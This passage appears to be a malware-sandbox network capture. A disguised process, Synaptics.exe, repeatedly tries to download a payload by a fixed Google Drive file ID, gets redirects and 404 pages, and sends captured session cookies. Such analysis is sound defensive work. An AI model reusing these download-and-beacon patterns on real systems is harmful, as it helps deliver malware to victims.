2024-12-30 10:37:22 UTC	1594	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6OJJOwGU7Ug3cBz3vUiBrcKNE3WsvQHNsh6af8ZWuj9AjXNuEx1xvebi8aWZ2ojqI5 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:22 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-gkcns_wxRuqi41G_tobIIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE; expires=Tue, 01-Jul-2025 10:37:22 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:22 UTC	1594	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 6d 66 71 66 34 56 64 5a 4d 7a 66 66 74 38 5a 4e 5a 78 69 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lmfqf4VdZMzfft8ZNZxihw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:37:22 UTC	58	IN	Data Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	50006	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:22 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:37:22 UTC	1601	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5T_ZQIWqWxZ53MH5O0tdZQuxKKyuEoz_11Q2ZeMsv5CCrWWib0Klw-trYwZaLOrl42PjeCgW4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:22 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-DlZJRg2QagAqdZU-uZgWAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=BDl_k14YG7ydbFCT7-3HIJujj9Q3hpU558xakM-GWpIgjkpeFigNKig-zMxkLzdRjVQ2vWFpwy7DN5SSH_HUc6WGPZGpsFz-gxkp7duFfZNFBBQczQ-EC6vww9TYrC0l6vJaLop2QqL5mfcaYXMttFx3iR-aEODuMZDS2X-WkWyELLLuopNMW-E; expires=Tue, 01-Jul-2025 10:37:22 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:22 UTC	1601	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 37 56 72 62 45 76 49 67 5a 5f 63 79 68 31 72 78 43 2d 5a 79 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w7VrbEvIgZ_cyh1rxC-ZyA">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:37:22 UTC	51	IN	Data Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: his server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	50008	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:23 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:23 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:23 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-g7tLbD1eqPQePLhd2_nvPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	50009	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:23 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bAtSZSfoXFBiluy46CB7k9cHRpfL4Bz73ZWRWPtP5k3G4Znb18NnXhXdYk8jopoJHGzMy0aIH0-Fg3dPaUleqXNTRyUFEREUv1J1hmPEi9rC8qfgpx5w8U5FK67fWNl8oakfOAzOBcIFTfBpN46uQQLYY_uY4fU8RdYmN11xJrpegf8ZaG8DoXya
2024-12-30 10:37:23 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4P_Q58FhK4ihuydHm9MOab7nqeHy1eiXkm1bZpO2VEooyYI7Gjk58LFO2KMis7_817 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:23 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-U14gpIBurdJLDQ1UdXqQUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:23 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:37:23 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 68 37 6a 77 39 4e 46 46 44 2d 51 54 34 50 73 5a 72 5f 64 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="3h7jw9NFFD-QT4PsZr_dbA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:37:23 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	50007	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:23 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:23 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:23 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-qRskM2jzZcqttpotZ0DOGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	50010	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:23 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bAtSZSfoXFBiluy46CB7k9cHRpfL4Bz73ZWRWPtP5k3G4Znb18NnXhXdYk8jopoJHGzMy0aIH0-Fg3dPaUleqXNTRyUFEREUv1J1hmPEi9rC8qfgpx5w8U5FK67fWNl8oakfOAzOBcIFTfBpN46uQQLYY_uY4fU8RdYmN11xJrpegf8ZaG8DoXya
2024-12-30 10:37:23 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5d_H4A3b6n9hdQ9hSLphQYG29Vy851XglmbAkAx8VWIqWsGPfBH2XN1h7nfxEKpjW1 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:23 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-CZjwJadSwfGUt_hr4gEAUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:23 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:37:23 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 2d 34 6f 78 34 50 77 7a 37 76 2d 6c 4b 49 67 5f 4f 68 70 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="1-4ox4Pwz7v-lKIg_Ohp4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:37:23 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	50015	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:24 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:24 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:24 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-cwDMtKnvJALibTYT6r04cA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	50021	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:25 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:25 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:25 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-pf8L-lG2Zqi2cUsQZBYyrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	50023	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:25 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:25 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:25 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-lJfs_icB-CDThB-NW_3wYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	50022	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:25 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
